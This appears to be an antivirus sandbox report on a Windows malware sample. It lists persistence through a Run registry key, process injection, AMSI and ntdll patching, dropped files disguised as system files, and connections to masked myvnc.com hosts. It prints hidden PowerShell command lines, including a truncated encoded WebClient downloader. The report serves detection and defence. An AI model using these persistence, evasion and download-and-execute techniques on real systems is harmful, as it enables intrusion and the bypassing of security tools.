Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WinSvcHelper' = '"<SYSTEM32>\conhost.exe" --headless -- "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -EncodedCommand ...
Creates or modifies the following files
- <SYSTEM32>\tasks\windowssystemservice
Malicious functions
Downloads and executes files.
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework64\v4.0.30319\msbuild.exe
- %WINDIR%\explorer.exe
Patches code
in AMSI dll
- explorer.exe process, Amsi.dll module
in NTDLL dll
- explorer.exe process, ntdll.dll module
Modifies file system
Creates the following files
- %TEMP%\bkxndb.exe
- %TEMP%\xfkvyp.exe
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\bkxndb.exe.log
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\xfkvyp.exe.log
- %TEMP%\tgxddr.exe
- %TEMP%\nnpjgu.exe
- %APPDATA%\microsoft\windows\templates\windowsdefender483ef1\csrss483ef1.png
- %APPDATA%\microsoft\windows\templates\windowsdefender483ef1\taskhost483ef1.exe
- %APPDATA%\microsoft\windows\templates\windowsdefender483ef1\wuauclt483ef1.xml
- nul
- %TEMP%\irn0kpea\irn0kpea.0.cs
- %TEMP%\irn0kpea\irn0kpea.cmdline
- %TEMP%\irn0kpea\irn0kpea.out
- %TEMP%\irn0kpea\cscface6a9aad354676ae771528ac633bcb.tmp
- %TEMP%\resa7ef.tmp
- %TEMP%\irn0kpea\irn0kpea.dll
- %TEMP%\content\416-5052-msbuild.exe-21-28-56-402.dump
- %TEMP%\5gwossd3\5gwossd3.0.cs
- %TEMP%\5gwossd3\5gwossd3.cmdline
- %TEMP%\5gwossd3\5gwossd3.out
- %TEMP%\5gwossd3\csc1c89b0b85def4dc08d8e3e4473ec997.tmp
- %TEMP%\resad2f.tmp
- %TEMP%\5gwossd3\5gwossd3.dll
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\explorer.exe.log
- %TEMP%\tyuivx5e\tyuivx5e.0.cs
- %TEMP%\tyuivx5e\tyuivx5e.cmdline
- %TEMP%\tyuivx5e\tyuivx5e.out
- %TEMP%\tyuivx5e\csc4e2476285a714f0e95b3b116ac9c1ba.tmp
- %TEMP%\rese3df.tmp
- %TEMP%\tyuivx5e\tyuivx5e.dll
- %TEMP%\content\1524-2880-msbuild.exe-21-29-12-090.dump
- %TEMP%\ggex0ocw\ggex0ocw.0.cs
- %TEMP%\ggex0ocw\ggex0ocw.cmdline
- %TEMP%\ggex0ocw\ggex0ocw.out
- %TEMP%\ggex0ocw\csc87f0a4134e2b484090e26bf9d479ba6b.tmp
- %TEMP%\rese9da.tmp
Deletes following files that it created itself
- %TEMP%\resa7ef.tmp
- %TEMP%\irn0kpea\cscface6a9aad354676ae771528ac633bcb.tmp
- %TEMP%\irn0kpea\irn0kpea.cmdline
- %TEMP%\irn0kpea\irn0kpea.pdb
- %TEMP%\irn0kpea\irn0kpea.dll
- %TEMP%\irn0kpea\irn0kpea.0.cs
- %TEMP%\irn0kpea\irn0kpea.out
- %TEMP%\resad2f.tmp
- %TEMP%\5gwossd3\csc1c89b0b85def4dc08d8e3e4473ec997.tmp
- %TEMP%\5gwossd3\5gwossd3.dll
- %TEMP%\5gwossd3\5gwossd3.cmdline
- %TEMP%\5gwossd3\5gwossd3.out
- %TEMP%\5gwossd3\5gwossd3.0.cs
- %TEMP%\rese3df.tmp
- %TEMP%\tyuivx5e\csc4e2476285a714f0e95b3b116ac9c1ba.tmp
- %TEMP%\tyuivx5e\tyuivx5e.0.cs
- %TEMP%\tyuivx5e\tyuivx5e.dll
- %TEMP%\tyuivx5e\tyuivx5e.cmdline
- %TEMP%\tyuivx5e\tyuivx5e.out
- %TEMP%\tyuivx5e\tyuivx5e.pdb
- %TEMP%\rese9da.tmp
- %TEMP%\ggex0ocw\csc87f0a4134e2b484090e26bf9d479ba6b.tmp
- %TEMP%\ggex0ocw\ggex0ocw.cmdline
- %TEMP%\ggex0ocw\ggex0ocw.0.cs
- %TEMP%\ggex0ocw\ggex0ocw.out
Network activity
Connects to
- 'la####1.myvnc.com':443
- 'la###.myvnc.com':80
TCP
Other
- 'la####1.myvnc.com':443
UDP
- DNS ASK la####1.myvnc.com
- DNS ASK la###.myvnc.com
Miscellaneous
Searches for the following windows
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Proxy Desktop' WindowName: ''
- ClassName: 'ApplicationFrameWindow' WindowName: ''
Creates and executes the following
- '%TEMP%\bkxndb.exe'
- '%TEMP%\xfkvyp.exe'
- '%TEMP%\tgxddr.exe'
- '%TEMP%\nnpjgu.exe'
- '%APPDATA%\microsoft\windows\templates\windowsdefender483ef1\taskhost483ef1.exe'
Executes the following
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\msbuild.exe' %APPDATA%\Microsoft\Windows\Templates\WindowsDefender483ef1\wuauclt483ef1.xml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -W Hidden -Command -
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\irn0kpea\irn0kpea.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA7EF.tmp" "%TEMP%\irn0kpea\CSCFACE6A9AAD354676AE771528AC633BCB.TMP"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\5gwossd3\5gwossd3.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAD2F.tmp" "%TEMP%\5gwossd3\CSC1C89B0B85DEF4DC08D8E3E4473EC997.TMP"
- '<SYSTEM32>\conhost.exe' --headless -- "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -EncodedCommand dAByAHkAewAkAHcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwA9ACQA...
- '%WINDIR%\explorer.exe'
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\tyuivx5e\tyuivx5e.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE3DF.tmp" "%TEMP%\tyuivx5e\CSC4E2476285A714F0E95B3B116AC9C1BA.TMP"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\ggex0ocw\ggex0ocw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE9DA.tmp" "%TEMP%\ggex0ocw\CSC87F0A4134E2B484090E26BF9D479BA6B.TMP"
- '%WINDIR%\systemapps\microsoft.windows.search_cw5n1h2txyewy\searchapp.exe' -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
- '<SYSTEM32>\svchost.exe' -k appmodel -p -s camsvc
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\irn0kpea\irn0kpea.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA7EF.tmp" "%TEMP%\irn0kpea\CSCFACE6A9AAD354676AE771528AC633BCB.TMP"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\5gwossd3\5gwossd3.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAD2F.tmp" "%TEMP%\5gwossd3\CSC1C89B0B85DEF4DC08D8E3E4473EC997.TMP"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\tyuivx5e\tyuivx5e.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE3DF.tmp" "%TEMP%\tyuivx5e\CSC4E2476285A714F0E95B3B116AC9C1BA.TMP"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\ggex0ocw\ggex0ocw.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE9DA.tmp" "%TEMP%\ggex0ocw\CSC87F0A4134E2B484090E26BF9D479BA6B.TMP"' (with hidden window)
